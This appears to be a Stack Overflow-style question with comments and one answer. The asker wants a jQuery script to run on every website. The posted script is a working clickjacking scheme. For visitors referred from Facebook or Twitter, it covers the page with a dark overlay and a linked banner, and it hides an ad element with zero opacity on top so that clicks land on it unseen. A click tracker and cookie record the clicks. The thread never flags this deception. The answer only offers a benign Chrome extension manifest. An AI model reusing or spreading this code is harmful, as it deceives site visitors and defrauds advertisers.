# Run script on every site

Tags: javascript

I have a script that I wish to have run when I navigate to any web site, but it only runs on some sites. How do I make it always run without referrer, and keep cookies?

```
  function getCookie(c_name) {
    var i, x, y, ARRcookies = document.cookie.split(";");
    for (i = 0; i < ARRcookies.length; i += 1) {
        x = ARRcookies[i].substr(0, ARRcookies[i].indexOf("="));
        y = ARRcookies[i].substr(ARRcookies[i].indexOf("=") + 1);
        x = x.replace(/^\s+|\s+$/g, "");
        if (x === c_name) {
            return (unescape(y))
        }
    }
 }

 // <![CDATA[
jQuery(function() {
    var sel = 'iframe';

    var x = document.referrer;
    var y = x.search("facebook");
    var z = x.search("//t.co");
    var w = x.search("twitter");

    if (((y > 0) || (z > 0) || (w > 0)) && (getCookie('clickedad'))) {
        $(sel).hide();
    }

    $(sel).iframeTracker({
        blurCallback: function() {
            var now = new Date();
            var time = now.getTime();
            time += 12*60*60*1000;
            now.setTime(time);
            document.cookie =
                'clickedad=1' +
                '; expires=' + now.toUTCString() +
                '; path=/';

            $(sel).fadeOut();
            $('#escuro').hide();
            $('#tela').hide();
        }
    });
});
// ]]>

$(function() {

    var x = document.referrer;
    var y = x.search("facebook");
    var z = x.search("//t.co");
    var w = x.search("twitter");

    if (((y > 0) || (z > 0) || (w > 0)) && (!getCookie('clickedad'))) {

        var xbanner = 1 + Math.floor(Math.random() * 100);
        var ybanner = 1 + Math.floor(Math.random() * 100);

        $('body').prepend('<div id="escuro" style="width:100%; height:100%; z-index:999999; background:#000; opacity:0.8; -moz-opacity:0.7; filter:alpha(opacity=70); position:fixed;"></div><div id="tela" style="width:970px; height:400px; top:370px; left:50%; margin-top:' + (-ybanner) + 'px; margin-left:' + (-525 - xbanner) + 'px; position:absolute; z-index:9999999;"><a href="http://goo.gl/7GGRwe" target="_blank"><img src="http://i.imgur.com/cP5movw.png" border="0" width="970" height="400" /></a></div>');

        $('#anuncioad').css({
            "position": "relative",
            "z-index": "99999999",
            "opacity": "0",
            "-moz-opacity": "0",
            "filter": "alpha(opacity=0)"
        });

        setTimeout(function() {
            $('#escuro').hide();
            $('#tela').hide();
        }, 120000);

    }

});
```

Comment: If the `referrer` isn't set, the script will fail with an error. If it's not set there's no way to know what site linked to your URL. (Even if it is set, you can't trust it.)

Comment: I have tried to remove the referrer and the script really stopped working.

Comment: There is nothing I can do for him to open without requiring referrer ?

Comment: Removed inappropriate "java" tag. Shortened title. Grammar; noise reduction; spacing.

Comment: when you say "run on every website", do you mean you want it to run on your machine against every website you visit?  That is going to depend quite a bit on which browser you are using.

Comment: write an extension for your browser

Comment: or write a script for the tampermonkey (Chrome) or greasemonkey (Firefox) extension and have it white listed for the URLs you want to.  That's the entire purpose of those extensions.

Answer (score 0):

I created a **Chrome Extension** to run some custom code to restore my Twitter background when they removed it.  Essentially it checks the URL of every page browsed to and if it gets a match then runs on that site.

Note: This only works in Chrome but can run against every page browsed to.

Manifest file is below...

```
{
  "manifest_version": 2,

  "name": "Restore Twitter Background",
  "description": "Allow user to add back their twitter background.",
  "version": "1.0",

  "browser_action": {
    "default_icon": "icon.png",
    "default_popup": "popup.html"
  },
  "content_scripts":[{
    "matches": ["https://twitter.com/*"],
    "css": ["css.css"]
  }]
}
```

Note the content_scripts and matches so that it only runs against Twitter URL.  I used CSS to fix my issue but you could include JS here instead and it should achieve what you're after.